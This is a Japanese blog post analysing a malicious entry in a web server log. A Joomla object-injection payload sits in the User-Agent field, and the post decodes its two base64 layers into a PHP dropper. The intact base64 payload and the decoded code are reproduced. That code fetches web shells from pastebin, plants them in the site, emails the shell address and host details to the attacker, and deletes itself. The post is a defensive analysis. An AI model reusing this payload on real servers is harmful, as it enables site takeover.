ダニの探求

ログファイルを見ていると、異常に長いものがたまに出てくる。この種のものはダニ・ワームかゴミ・ウイルスというのが定番である。触らぬダニにたたりなし、君子ゴミに近寄らず、で対処するのが普通である。簡単にいえば、無視して放置である。
LOG
77.234.46.156 - - [02/Dec/2018:11:31:21 +0900] "GET / HTTP/1.1" 302 20 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:3450:\"eval(base64_decode
('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2xvbC5waHAiIDsNCiRmcD1mb3BlbigiJGNoZWNrIiwidysi
KTsNCmZ3cml0ZSgkZnAsYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbVoxYm1OMGFXOXVJR2gwZEhCZloyVjBLQ1IxY213cGV3MEtDU1JwYlNBOUlHTj
FjbXhmYVc1cGRDZ2tkWEpzS1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZVa3hQVUZSZlVrVlVWVkpPVkZKQlRsTkdSVklzSURFcE93MEtD
V04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOURUMDVPUlVOVVZFbE5SVTlWVkN3Z01UQXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBiU3
dnUTFWU1RFOVFWRjlHVDB4TVQxZE1UME5CVkVsUFRpd2dNU2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWDBoRlFVUkZVaXdn
TUNrN0RRb0pjbVYwZFhKdUlHTjFjbXhmWlhobFl5Z2thVzBwT3cwS0NXTjFjbXhmWTJ4dmMyVW9KR2x0S1RzTkNuME5DaVJqYUdWamF5QTlJQ1JmVT
BWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDJ4cFluSmhjbWxsY3k5cWIyOXRiR0V2WTNOekxuQm9jQ0lnT3cwS0pIUmxlSFFnUFNC
b2RIUndYMmRsZENnbmFIUjBjRG92TDNCaGMzUmxZbWx1TG1OdmJTOXlZWGN2V1RkcE5URmxlRUluS1RzTkNpUnZjR1Z1SUQwZ1ptOXdaVzRvSkdOb1
pXTnJMQ0FuZHljcE93MEtabmR5YVhSbEtDUnZjR1Z1TENBa2RHVjRkQ2s3RFFwbVkyeHZjMlVvSkc5d1pXNHBPdzBLYVdZb1ptbHNaVjlsZUdsemRI
TW9KR05vWldOcktTbDdEUW9nSUNBZ1pXTm9ieUFrWTJobFkyc3VJand2WW5JK0lqc05DbjFsYkhObElBMEtJQ0JsWTJodklDSnViM1FnWlhocGRITW
lPdzBLWldOb2J5QWlaRzl1WlNBdVhHNGdJaUE3RFFva1kyaGxZMnN5SUQwZ0pGOVRSVkpXUlZKYkowUlBRMVZOUlU1VVgxSlBUMVFuWFNBdUlDSXZi
R2xpY21GeWFXVnpMMnB2YjIxc1lTOXFiV0ZwYkM1d2FIQWlJRHNOQ2lSMFpYaDBNaUE5SUdoMGRIQmZaMlYwS0Nkb2RIUndPaTh2Y0dGemRHVmlhVz
R1WTI5dEwzSmhkeTlxTlZWMFIxbGtNaWNwT3cwS0pHOXdaVzR5SUQwZ1ptOXdaVzRvSkdOb1pXTnJNaXdnSjNjbktUc05DbVozY21sMFpTZ2tiM0Js
YmpJc0lDUjBaWGgwTWlrN0RRcG1ZMnh2YzJVb0pHOXdaVzR5S1RzTkNtbG1LR1pwYkdWZlpYaHBjM1J6S0NSamFHVmpheklwS1hzTkNpQWdJQ0JsWT
JodklDUmphR1ZqYXpJdUlqd3ZZbkkrSWpzTkNuMWxiSE5sSUEwS0lDQmxZMmh2SUNKdWIzUWdaWGhwZEhNeUlqc05DbVZqYUc4Z0ltUnZibVV5SUM1
Y2JpQWlJRHNOQ2cwS0pHTm9aV05yTXowa1gxTkZVbFpGVWxzblJFOURWVTFGVGxSZlVrOVBWQ2RkSUM0Z0lpOWxaeTVvZEcwaUlEc05DaVIwWlhoME
15QTlJR2gwZEhCZloyVjBLQ2RvZEhSd09pOHZjR0Z6ZEdWaWFXNHVZMjl0TDNKaGR5OTRSRlJZY25NeVpDY3BPdzBLSkc5d016MW1iM0JsYmlna1ky
aGxZMnN6TENBbmR5Y3BPdzBLWm5keWFYUmxLQ1J2Y0RNc0pIUmxlSFF6S1RzTkNtWmpiRzl6WlNna2IzQXpLVHNOQ2cwS0pHTm9aV05yTkQwa1gxTk
ZVbFpGVWxzblJFOURWVTFGVGxSZlVrOVBWQ2RkSUM0Z0lpOXNhV0p5WVhKcFpYTXZhbTl2Yld4aEwyTm9aV05yTG5Cb2NDSWdPdzBLSkhSbGVIUTBJ
RDBnYUhSMGNGOW5aWFFvSjJoMGRIQTZMeTl3WVhOMFpXSnBiaTVqYjIwdmNtRjNMMWszYVRVeFpYaENKeWs3RFFva2IzQTBQV1p2Y0dWdUtDUmphR1
ZqYXpRc0lDZDNKeWs3RFFwbWQzSnBkR1VvSkc5d05Dd2tkR1Y0ZERRcE93MEtabU5zYjNObEtDUnZjRFFwT3cwS0RRb2tZMmhsWTJzMVBTUmZVMFZT
VmtWU1d5ZEVUME5WVFVWT1ZGOVNUMDlVSjEwZ0xpQWlMMnhwWW5KaGNtbGxjeTlxYjI5dGJHRXZhbTFoYVd4ekxuQm9jQ0lnT3cwS0pIUmxlSFExSU
QwZ2FIUjBjRjluWlhRb0oyaDBkSEE2THk5d1lYTjBaV0pwYmk1amIyMHZjbUYzTDJvMVZYUkhXV1F5SnlrN0RRb2tiM0ExUFdadmNHVnVLQ1JqYUdW
amF6VXNJQ2QzSnlrN0RRcG1kM0pwZEdVb0pHOXdOU3drZEdWNGREVXBPdzBLWm1Oc2IzTmxLQ1J2Y0RVcE93MEtEUW9OQ2lSMGIzb2dQU0FpWVd4aG
NtYzFNMEJuYldGcGJDNWpiMjBzSUdGc1lYSm5OVE5BYUc5MGJXRnBiQzVqYjIwaU93MEtKSE4xWW1wbFkzUWdQU0FuU205dElIcDZlaUFuSUM0Z0pG
OVRSVkpXUlZKYkoxTkZVbFpGVWw5T1FVMUZKMTA3RFFva2FHVmhaR1Z5SUQwZ0oyWnliMjA2SUVSeUxsTnBURzVVSUVocGJFd2dQR0ZzWVhKbk5UTk
FaMjFoYVd3dVkyOXRQaWNnTGlBaVhISmNiaUk3RFFva2JXVnpjMkZuWlNBOUlDSlRhR1ZzYkhvZ09pQm9kSFJ3T2k4dklpQXVJQ1JmVTBWU1ZrVlNX
eWRUUlZKV1JWSmZUa0ZOUlNkZElDNGdJaTlzYVdKeVlYSnBaWE12YW05dmJXeGhMMnB0WVdsc0xuQm9jRDkxSWlBdUlDSmNjbHh1SWlBdUlIQm9jRj
kxYm1GdFpTZ3BJQzRnSWx4eVhHNGlPdzBLSkhObGJuUnRZV2xzSUQwZ1FHMWhhV3dvSkhSdmVpd2dKSE4xWW1wbFkzUXNJQ1J0WlhOellXZGxMQ0Fr
YUdWaFpHVnlLVHNOQ2cwS1FIVnViR2x1YXloZlgwWkpURVZmWHlrN0RRb05DZzBLUHo0PScpKTsNCmZjbG9zZSgkZnApOw=='));
JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd
"
問題はこのダラダラと書いてある赤い字の部分である。実際は1行だが長いので適当な所で改行してある(以下同じ)。これが書かれているのは、いわゆる「ユーザーエージェント」の部分だから、これだけでは何らかの「悪さ」をすることはまずない

しかし、このオトコは、といってもダニだから性別は不明だが、一体何をしたかったのか。それがちょっと気になる。「つれづれなるままに」ちょっと遊んでみた。

出てくる文字で意味のありそうな英単語を拾い出していくと次のようになる。なにかのコマンドもどきの単語が多数入っている。何か怪しいことをたくらんでいることはすぐにわかる。
LOG
JDatabaseDriverMysqli
fc
JSimplepieFactory
disconnectHandlers
SimplePie
sanitize
JDatabaseDriverMysql
feed_url
eval(base64_decode
('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2xvbC5waHAiIDsNCiRmcD1mb3BlbigiJGNoZWN
rIiwidysiKTsNCmZ3cml0ZSgkZnAsYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbVoxYm1OMGFXOXVJR2gwZEhCZloyVjBLQ1IxY213cGV3MEtDU1JwY
lNBOUlHTjFjbXhmYVc1cGRDZ2tkWEpzS1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZVa3hQVUZSZlVrVlVWVkpPVkZKQlRsTkdSVklzSUR
FcE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOURUMDVPUlVOVVZFbE5SVTlWVkN3Z01UQXBPdzBLQ1dOMWNteGZjMlYwYjNCM
EtDUnBiU3dnUTFWU1RFOVFWRjlHVDB4TVQxZE1UME5CVkVsUFRpd2dNU2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWDBoRlF
VUkZVaXdnTUNrN0RRb0pjbVYwZFhKdUlHTjFjbXhmWlhobFl5Z2thVzBwT3cwS0NXTjFjbXhmWTJ4dmMyVW9KR2x0S1RzTkNuME5DaVJqYUdWamF5Q
TlJQ1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDJ4cFluSmhjbWxsY3k5cWIyOXRiR0V2WTNOekxuQm9jQ0lnT3cwS0pIUmx
lSFFnUFNCb2RIUndYMmRsZENnbmFIUjBjRG92TDNCaGMzUmxZbWx1TG1OdmJTOXlZWGN2V1RkcE5URmxlRUluS1RzTkNpUnZjR1Z1SUQwZ1ptOXdaV
zRvSkdOb1pXTnJMQ0FuZHljcE93MEtabmR5YVhSbEtDUnZjR1Z1TENBa2RHVjRkQ2s3RFFwbVkyeHZjMlVvSkc5d1pXNHBPdzBLYVdZb1ptbHNaVjl
sZUdsemRITW9KR05vWldOcktTbDdEUW9nSUNBZ1pXTm9ieUFrWTJobFkyc3VJand2WW5JK0lqc05DbjFsYkhObElBMEtJQ0JsWTJodklDSnViM1FnW
lhocGRITWlPdzBLWldOb2J5QWlaRzl1WlNBdVhHNGdJaUE3RFFva1kyaGxZMnN5SUQwZ0pGOVRSVkpXUlZKYkowUlBRMVZOUlU1VVgxSlBUMVFuWFN
BdUlDSXZiR2xpY21GeWFXVnpMMnB2YjIxc1lTOXFiV0ZwYkM1d2FIQWlJRHNOQ2lSMFpYaDBNaUE5SUdoMGRIQmZaMlYwS0Nkb2RIUndPaTh2Y0dGe
mRHVmlhVzR1WTI5dEwzSmhkeTlxTlZWMFIxbGtNaWNwT3cwS0pHOXdaVzR5SUQwZ1ptOXdaVzRvSkdOb1pXTnJNaXdnSjNjbktUc05DbVozY21sMFp
TZ2tiM0JsYmpJc0lDUjBaWGgwTWlrN0RRcG1ZMnh2YzJVb0pHOXdaVzR5S1RzTkNtbG1LR1pwYkdWZlpYaHBjM1J6S0NSamFHVmpheklwS1hzTkNpQ
WdJQ0JsWTJodklDUmphR1ZqYXpJdUlqd3ZZbkkrSWpzTkNuMWxiSE5sSUEwS0lDQmxZMmh2SUNKdWIzUWdaWGhwZEhNeUlqc05DbVZqYUc4Z0ltUnZ
ibVV5SUM1Y2JpQWlJRHNOQ2cwS0pHTm9aV05yTXowa1gxTkZVbFpGVWxzblJFOURWVTFGVGxSZlVrOVBWQ2RkSUM0Z0lpOWxaeTVvZEcwaUlEc05Da
VIwWlhoME15QTlJR2gwZEhCZloyVjBLQ2RvZEhSd09pOHZjR0Z6ZEdWaWFXNHVZMjl0TDNKaGR5OTRSRlJZY25NeVpDY3BPdzBLSkc5d016MW1iM0J
sYmlna1kyaGxZMnN6TENBbmR5Y3BPdzBLWm5keWFYUmxLQ1J2Y0RNc0pIUmxlSFF6S1RzTkNtWmpiRzl6WlNna2IzQXpLVHNOQ2cwS0pHTm9aV05yT
kQwa1gxTkZVbFpGVWxzblJFOURWVTFGVGxSZlVrOVBWQ2RkSUM0Z0lpOXNhV0p5WVhKcFpYTXZhbTl2Yld4aEwyTm9aV05yTG5Cb2NDSWdPdzBLSkh
SbGVIUTBJRDBnYUhSMGNGOW5aWFFvSjJoMGRIQTZMeTl3WVhOMFpXSnBiaTVqYjIwdmNtRjNMMWszYVRVeFpYaENKeWs3RFFva2IzQTBQV1p2Y0dWd
UtDUmphR1ZqYXpRc0lDZDNKeWs3RFFwbWQzSnBkR1VvSkc5d05Dd2tkR1Y0ZERRcE93MEtabU5zYjNObEtDUnZjRFFwT3cwS0RRb2tZMmhsWTJzMVB
TUmZVMFZTVmtWU1d5ZEVUME5WVFVWT1ZGOVNUMDlVSjEwZ0xpQWlMMnhwWW5KaGNtbGxjeTlxYjI5dGJHRXZhbTFoYVd4ekxuQm9jQ0lnT3cwS0pIU
mxlSFExSUQwZ2FIUjBjRjluWlhRb0oyaDBkSEE2THk5d1lYTjBaV0pwYmk1amIyMHZjbUYzTDJvMVZYUkhXV1F5SnlrN0RRb2tiM0ExUFdadmNHVnV
LQ1JqYUdWamF6VXNJQ2QzSnlrN0RRcG1kM0pwZEdVb0pHOXdOU3drZEdWNGREVXBPdzBLWm1Oc2IzTmxLQ1J2Y0RVcE93MEtEUW9OQ2lSMGIzb2dQU
0FpWVd4aGNtYzFNMEJuYldGcGJDNWpiMjBzSUdGc1lYSm5OVE5BYUc5MGJXRnBiQzVqYjIwaU93MEtKSE4xWW1wbFkzUWdQU0FuU205dElIcDZlaUF
uSUM0Z0pGOVRSVkpXUlZKYkoxTkZVbFpGVWw5T1FVMUZKMTA3RFFva2FHVmhaR1Z5SUQwZ0oyWnliMjA2SUVSeUxsTnBURzVVSUVocGJFd2dQR0ZzW
VhKbk5UTkFaMjFoYVd3dVkyOXRQaWNnTGlBaVhISmNiaUk3RFFva2JXVnpjMkZuWlNBOUlDSlRhR1ZzYkhvZ09pQm9kSFJ3T2k4dklpQXVJQ1JmVTB
WU1ZrVlNXeWRUUlZKV1JWSmZUa0ZOUlNkZElDNGdJaTlzYVdKeVlYSnBaWE12YW05dmJXeGhMMnB0WVdsc0xuQm9jRDkxSWlBdUlDSmNjbHh1SWlBd
UlIQm9jRjkxYm1GdFpTZ3BJQzRnSWx4eVhHNGlPdzBLSkhObGJuUnRZV2xzSUQwZ1FHMWhhV3dvSkhSdmVpd2dKSE4xWW1wbFkzUXNJQ1J0WlhOell
XZGxMQ0FrYUdWaFpHVnlLVHNOQ2cwS1FIVnViR2x1YXloZlgwWkpURVZmWHlrN0RRb05DZzBLUHo0PScpKTsNCmZjbG9zZSgkZnApOw==
'))
JFactory::getConfig();exit
cache_name_function
assert
cache
cache_class
JDatabaseDriverMysql
init
connection
こうみてくると、意味が何となく通じそうなところは「base64_decode」ぐらいである。どうやら青い文字の部分がbase64になっていて、これをデコードする(したい)ということが想像できる。

さて、その青色部分は一体何か。これがエロオヤジならば「イヤらしい画像を復元したい」と相場は決まっているが、それがハッキリとわからない。base64の復元(デコード)は、それがどんなファイルであったのかが事前にわかっていなければ復元できないからである。簡単にいえば、元のファイルがどんな拡張子のファイルだったのかということが重要である。

ここは*.jpg画像だと仮定して、これを一応復元してみよう。それがgomilog.jpgである。これをWindowsの「フォト」で見てみると次のようになる。


どうやら、*.jpg画像ではなかったようである。念のため、これをtypeしてみると次のようになった。


何のことはない。「ただのテキスト」ファイルだったわけである。そして、その中にもまた「base64_decode」というのがある。その対象部分を取り出すと次のようになる。これがエロオヤジの目的のイヤらしい画像か、それにしてはサイズが小さいが。

LOG
PD9waHANCmZ1bmN0aW9uIGh0dHBfZ2V0KCR1cmwpew0KCSRpbSA9IGN1cmxfaW5pdCgkdXJsKTsNCgljdXJsX3NldG9wdCgkaW0sIE
NVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgMTApOw0K
CWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgMSk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0hFQU
RFUiwgMCk7DQoJcmV0dXJuIGN1cmxfZXhlYygkaW0pOw0KCWN1cmxfY2xvc2UoJGltKTsNCn0NCiRjaGVjayA9ICRfU0VSVkVSWydE
T0NVTUVOVF9ST09UJ10gLiAiL2xpYnJhcmllcy9qb29tbGEvY3NzLnBocCIgOw0KJHRleHQgPSBodHRwX2dldCgnaHR0cDovL3Bhc3
RlYmluLmNvbS9yYXcvWTdpNTFleEInKTsNCiRvcGVuID0gZm9wZW4oJGNoZWNrLCAndycpOw0KZndyaXRlKCRvcGVuLCAkdGV4dCk7
DQpmY2xvc2UoJG9wZW4pOw0KaWYoZmlsZV9leGlzdHMoJGNoZWNrKSl7DQogICAgZWNobyAkY2hlY2suIjwvYnI
+IjsNCn1lbHNlIA0KICBlY2hvICJub3QgZXhpdHMiOw0KZWNobyAiZG9uZSAuXG4gIiA7DQokY2hlY2syID0gJF9TRVJWRVJbJ0RPQ
1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2pvb21sYS9qbWFpbC5waHAiIDsNCiR0ZXh0MiA9IGh0dHBfZ2V0KCdodHRwOi8vcGF
zdGViaW4uY29tL3Jhdy9qNVV0R1lkMicpOw0KJG9wZW4yID0gZm9wZW4oJGNoZWNrMiwgJ3cnKTsNCmZ3cml0ZSgkb3BlbjIsICR0Z
Xh0Mik7DQpmY2xvc2UoJG9wZW4yKTsNCmlmKGZpbGVfZXhpc3RzKCRjaGVjazIpKXsNCiAgICBlY2hvICRjaGVjazIuIjwvYnI
+IjsNCn1lbHNlIA0KICBlY2hvICJub3QgZXhpdHMyIjsNCmVjaG8gImRvbmUyIC5cbiAiIDsNCg0KJGNoZWNrMz0kX1NFUlZFUlsnR
E9DVU1FTlRfUk9PVCddIC4gIi9lZy5odG0iIDsNCiR0ZXh0MyA9IGh0dHBfZ2V0KCdodHRwOi8vcGFzdGViaW4uY29tL3Jhdy94RFR
YcnMyZCcpOw0KJG9wMz1mb3BlbigkY2hlY2szLCAndycpOw0KZndyaXRlKCRvcDMsJHRleHQzKTsNCmZjbG9zZSgkb3AzKTsNCg0KJ
GNoZWNrND0kX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi9saWJyYXJpZXMvam9vbWxhL2NoZWNrLnBocCIgOw0KJHRleHQ0ID0
gaHR0cF9nZXQoJ2h0dHA6Ly9wYXN0ZWJpbi5jb20vcmF3L1k3aTUxZXhCJyk7DQokb3A0PWZvcGVuKCRjaGVjazQsICd3Jyk7DQpmd
3JpdGUoJG9wNCwkdGV4dDQpOw0KZmNsb3NlKCRvcDQpOw0KDQokY2hlY2s1PSRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL2x
pYnJhcmllcy9qb29tbGEvam1haWxzLnBocCIgOw0KJHRleHQ1ID0gaHR0cF9nZXQoJ2h0dHA6Ly9wYXN0ZWJpbi5jb20vcmF3L2o1V
XRHWWQyJyk7DQokb3A1PWZvcGVuKCRjaGVjazUsICd3Jyk7DQpmd3JpdGUoJG9wNSwkdGV4dDUpOw0KZmNsb3NlKCRvcDUpOw0KDQo
NCiR0b3ogPSAiYWxhcmc1M0BnbWFpbC5jb20sIGFsYXJnNTNAaG90bWFpbC5jb20iOw0KJHN1YmplY3QgPSAnSm9tIHp6eiAnIC4gJ
F9TRVJWRVJbJ1NFUlZFUl9OQU1FJ107DQokaGVhZGVyID0gJ2Zyb206IERyLlNpTG5UIEhpbEwgPGFsYXJnNTNAZ21haWwuY29tPic
gLiAiXHJcbiI7DQokbWVzc2FnZSA9ICJTaGVsbHogOiBodHRwOi8vIiAuICRfU0VSVkVSWydTRVJWRVJfTkFNRSddIC4gIi9saWJyY
XJpZXMvam9vbWxhL2ptYWlsLnBocD91IiAuICJcclxuIiAuIHBocF91bmFtZSgpIC4gIlxyXG4iOw0KJHNlbnRtYWlsID0gQG1haWw
oJHRveiwgJHN1YmplY3QsICRtZXNzYWdlLCAkaGVhZGVyKTsNCg0KQHVubGluayhfX0ZJTEVfXyk7DQoNCg0KPz4=
とにかく、これをもう一度*.jpg画像だとして復元する。それがgomigomi.jpgである。


やはりこれも*.jpg画像ではなかった。先の例から推測すれば、これも多分テキストファイルであろう。これをtypeしてみると今度はこういうものが出てきた。


これはPHPのプログラムである。目くらましのために二重構造になっていたBase64のエンコードだったようである。
以下では安全確保のため、タグは無効化して、URLがリンクにならないように「/」は「#」に「.」は「!」に変更してある。
また、原文にはあったプログラムの開始マークと終了マークはカットしてある(これを取れば動作することはない)。

参考 function http_get($url){ $im = curl_init($url); curl_setopt($im, CURLOPT_RETURNTRANSFER, 1); curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($im, CURLOPT_HEADER, 0); return curl_exec($im); curl_close($im); } $check = $_SERVER['DOCUMENT_ROOT'] . "#libraries#joomla#css!php" ; $text = http_get('http:##pastebin!com#raw#Y7i51exB'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."</br>"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "#libraries#joomla#jmail!php" ; $text2 = http_get('http:##pastebin!com$raw#j5UtGYd2'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."</br>"; }else echo "not exits2"; echo "done2 .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "#eg!htm" ; $text3 = http_get('http:##pastebin!com#raw#xDTXrs2d'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check4=$_SERVER['DOCUMENT_ROOT'] . "#libraries#joomla#check!php" ; $text4 = http_get('http:##pastebin!com#raw#Y7i51exB'); $op4=fopen($check4, 'w'); fwrite($op4,$text4); fclose($op4); $check5=$_SERVER['DOCUMENT_ROOT'] . "#libraries#joomla#jmails!php" ; $text5 = http_get('http:##pastebin!com#raw#j5UtGYd2'); $op5=fopen($check5, 'w'); fwrite($op5,$text5); fclose($op5); $toz = "alarg53@gmail!com, alarg53@hotmail!com"; $subject = 'Jom zzz ' . $_SERVER['SERVER_NAME']; $header = 'from: Dr.SiLnT HilL <alarg53@gmail!com>' . "\r\n"; $message = "Shellz : http:##" . $_SERVER['SERVER_NAME'] . "#libraries#joomla#jmail!php?u" . "\r\n" . php_uname() . "\r\n"; $sentmail = @mail($toz, $subject, $message, $header); @unlink(__FILE__);

メモ
やはりダニである。あまり近づかないほうがいい種類のものであることがわかってくる。結局、ログファイルのああいう所にこういうプログラムの素-状況によってはウイルスとして生き返るもの-が埋め込まれていたということになる。もっとも、これがログファイル中に単に「あんな形」であるだけならまったく問題にならない。しかし、ログにあるということはサーバーに存在しているということである。

あとでこれを取り出して復元するような機能を持ったダニが入ってくれば、そういうものに乗っ取られるということにもなりかねない。この部分がPHPのプログラムであるということがわかっている者(これを作った者)が、これをBase64のデコードで*.phpとして復元した場合、トロイの木馬のように、実際に「いかがわしい」動作をするプログラムが内部に存在してしまうことになる。

いずれにしても、ログファイルの大半は無意味なものであるが、ローカルにおいてもフラットなテキストファイルとしては長く持たないほうがいいようである。

- 2018/12/02 -